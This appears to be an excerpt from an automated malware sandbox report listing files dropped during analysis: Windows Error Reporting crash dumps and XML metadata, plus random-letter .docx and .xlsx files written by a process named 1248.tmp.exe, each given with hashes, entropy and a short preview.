                                                                                                                                  SHA-512:4F2D08ED69B21957AA5A56697F12AF54153ED33C4CF0ECAFE63EBC03858CA4649F4A7E465254E8E39FA19C621651DC7D4DA19943F1F47EC920EE368C1C0B2FAF
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER89FB.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.464375855329204
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zs0Jg77aI9nEWpW8VY5Ym8M4JqsMFkb+q8vzsJ1KNfNwd:uIjfyI7hd7VpJvbKOKNfNwd
                                                                                                                                  MD5:025D0D51FE429EFC366E0382CDF47711
                                                                                                                                  SHA1:C36D932A3DC41557D855CAFE0C3202BA94A4C317
                                                                                                                                  SHA-256:E115FBFC58EDA2C3A99C4C9900DC8C160966974FDE4BCB7F840500A5956B181E
                                                                                                                                  SHA-512:F9179DACD24F0A5DE262BF0ED4C17F9EED9CB7F76E0EB80BCD615ED0EC6EC91023030EF1C6556E123417A1C02822A098CF05C633F4DFFB28BEAA4AAF64B2D68C
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537032" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FB.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:28:47 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):85516
                                                                                                                                  Entropy (8bit):1.904338781761617
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:S4GgD/pFsgE+I1o3HTmEvNQ+vbOnJ6DYBnqKI2jdZ7ucC3U7TiA:S4XDAgE+0oS1+tsJqKI2jboIT
                                                                                                                                  MD5:67D5C4B372B32E45D6EECC80296A8CFE
                                                                                                                                  SHA1:32999374CBB2C263F23274087E06B30656059317
                                                                                                                                  SHA-256:2EF6985AB251175C9768E819BBB1367EDC5DF59AE93731268E291BC20DAF7898
                                                                                                                                  SHA-512:3ECDD580259510E9BBEB04AF7BC11CBD086850FADD041CB999438655850B459AB27390A39834D93B3EF991B1291F177DBA73C2A5431334D562EEFA34E47D7B90
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... ......./..g........................P...............@1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB06.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8404
                                                                                                                                  Entropy (8bit):3.6972142013516915
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ1h6TV6YVD6pPsGgmfLYspBG89bg6sfkgm:R6lXJz6h6Yh6LgmfL5gZfi
                                                                                                                                  MD5:B096B4B4D0DF5CC1D49D159CF7B786E3
                                                                                                                                  SHA1:E2A6847686AEDCAB928D97E08A481B466E044C87
                                                                                                                                  SHA-256:18B41D922DBBD16B916718CB7D34A29294F2D10DD4083C57B9870025A18CC1BA
                                                                                                                                  SHA-512:25FC39173AF94C6F68DC5DAF96B1DE9C371716A2D707DBCEDA914F3A94E827AF4A34297B164D7EBAFADC52A4E725853AD93596CDDC282D9AD5E746AA8B08ED93
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB36.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.463423535198592
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VYmoYm8M4JqsHFz+q8vzsU1KNfNwd:uIjffI7hd7VxFJrKxKNfNwd
                                                                                                                                  MD5:1CF0F946DFB199DA9B69491386B24E73
                                                                                                                                  SHA1:963DFC91441DB12FF205B82E89333E93F96C8CDB
                                                                                                                                  SHA-256:5B6E2D3EB8FBEAA2BEFBE36CBFF6FC57D330EB22BCA3831926B9FA980BDDF15A
                                                                                                                                  SHA-512:CDC09CBF30293DD034CBD9323C89D4AEE766D9D1A08D177D7128CE6096AF1BA09B2CA8BF4C04ACD0EF6337670F26EB92D5914BB9697B77042E7FA5783E844778
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB4.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:28:48 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):85408
                                                                                                                                  Entropy (8bit):1.9264570899438909
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:zgD/zgEGkr3HTmElhStLvbOnJ6DYBnqKI2jdZ7ucCZ1QTwe:sDrgEG2SmhStLtsJqKI2jbod
                                                                                                                                  MD5:A294DD2CAD645BE6E54E0581D3A32617
                                                                                                                                  SHA1:CF953649C8DDD435A10AC2C05A38BDFE8B64B8DF
                                                                                                                                  SHA-256:F5C957F97A674BD9E431B15BA9AA9A9AB2C34C3D14EC21F108C5F7ACFB9032A3
                                                                                                                                  SHA-512:9AD7CA7D00D6E5F027F84959793805B3EFAB2AEF4795192D331E32F936F7009DE91CE1405C56584077983A79869FE65CB04E90A81213D21C839761308D29D8F0
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......0..g........................P...............@1..........T.......8...........T...........h ..8-..........L...........8...............................................................................eJ..............GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE51.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8404
                                                                                                                                  Entropy (8bit):3.6969951500622784
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ1o6y6YV56pPsGgmfLYspBj89b36sfJj9m:R6lXJa6y6Y76LgmfLC3Zfm
                                                                                                                                  MD5:8E93D701DD76A3F6777CEA24AE1F0104
                                                                                                                                  SHA1:CAAE665B893A0D0CE3385A58F63A65DF8260A972
                                                                                                                                  SHA-256:CA1FD3AD1BFE153F913160FEFB3C161BD5E0F560239768C1B460B3E2FC510050
                                                                                                                                  SHA-512:B71DB8B76E10810BE4F89101CB1E6BDDEFD53219D5F065B9A2DAB299A18EC335477334BC517C92CD5A27F5D1E40A4D2D2B1E44A9C78334E4406FEC564983B24F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEF.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.466471373514165
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VYLYm8M4JqsHFuU+q8vzsU1KNfNwd:uIjffI7hd7VnJ5KxKNfNwd
                                                                                                                                  MD5:D53B51DCC9E5953678EE9976A8B340C3
                                                                                                                                  SHA1:127AD9D35CFF493D80E44E23509D99C8C7865AA2
                                                                                                                                  SHA-256:CD4510A2EA8F8E24C13E3029F0D5A491A93E572723849AB46F9E41229DD4B8F0
                                                                                                                                  SHA-512:85C456FC99452EAB52F06FF604CBA19664DF5C00787A7A6E98C0967B50B9292C25BD755FC0A494D231164357CFD3D0F67B18C0AA361990AA3DA65BBE1641E01A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\SQRKHNBNYN.xlsx

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1026
                                                                                                                                  Entropy (8bit):4.699088014379539
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
                                                                                                                                  MD5:BF469DD8C21F5160EACD49BB59E9A370
                                                                                                                                  SHA1:2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
                                                                                                                                  SHA-256:9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
                                                                                                                                  SHA-512:FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN

                                                                                                                                  C:\ProgramData\TQDGENUHWP.docx

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1026
                                                                                                                                  Entropy (8bit):4.696312162983912
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
                                                                                                                                  MD5:83B91EFB8185C5AF5A6B60F4FE9CC2D2
                                                                                                                                  SHA1:0EB7AE1817790DFC5225A02B74A272C84FEE4240
                                                                                                                                  SHA-256:8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
                                                                                                                                  SHA-512:F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

                                                                                                                                  C:\ProgramData\TTCBKWZYOC.docx

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1026
                                                                                                                                  Entropy (8bit):4.695977454005895
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
                                                                                                                                  MD5:E0510B4427516C1D89AAD3659D680C3D
                                                                                                                                  SHA1:1992D34F6239D80EB43BA39F3222BF0785E5D1F4
                                                                                                                                  SHA-256:556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
                                                                                                                                  SHA-512:35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

                                                                                                                                  C:\ProgramData\XQACHMZIHU.docx

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1026
                                                                                                                                  Entropy (8bit):4.693522326362693
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
                                                                                                                                  MD5:77EC10F00D9B9E14ECB007C137CF869E
                                                                                                                                  SHA1:F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
                                                                                                                                  SHA-256:22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
                                                                                                                                  SHA-512:AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

                                                                                                                                  C:\ProgramData\XQACHMZIHU.xlsx

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1026
                                                                                                                                  Entropy (8bit):4.693522326362693
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
